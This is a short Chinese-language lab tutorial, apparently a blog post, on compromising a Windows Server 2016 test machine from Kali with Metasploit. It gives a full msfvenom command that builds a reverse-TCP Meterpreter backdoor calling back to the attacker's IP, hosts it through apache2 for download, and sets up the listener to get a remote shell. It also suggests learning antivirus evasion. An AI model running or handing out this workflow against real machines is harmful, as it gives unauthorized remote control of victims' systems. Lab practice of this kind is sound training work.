metasploit上线windows2016靶机

  • A+
所属分类:Metasploit

攻击机:kali
靶机:windows2016

一、生成后门

由于这个后门没有经过免杀,所以需要你们把windows2016防火墙关闭,你们·可以·自己去学习一下免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1(自己kali的IP) lport=50000 -f exe>test.exe

metasploit上线windows2016靶机

二、windows2016靶机下载后门

1、首先,我们需要开启apache2,然后将后门放入/var/www/html目录下

metasploit上线windows2016靶机

2、windows2016下载后门程序

在网页输入自己IP加后门名字浏览器打开就行

http://192.168.0.1/test.exe

metasploit上线windows2016靶机

三、设置监听

先在kali设置监听,然后运行后门程序

1、开启metasploit

先输入sudo msfconsole然后输入kali密码
metasploit上线windows2016靶机

2、设置监听模块

LHOST和LPORT填生成后门的IP地址和端口,然后在设置一下连接方式
metasploit上线windows2016靶机
metasploit上线windows2016靶机

四、上线windows2016靶机

1、先点击run,然后在运行windows2016靶机的后门程序

metasploit上线windows2016靶机
metasploit上线windows2016靶机
metasploit上线windows2016靶机
这就上线windows2016靶机成功了,然后使用shell命令进入windows2016控制台,由于两个系统有区别会出现乱码,我们使用chcp 65001解决。

注:由于本人表达能力不怎么样,如有冒犯或错误,请及时告知,谢谢!

w3cjava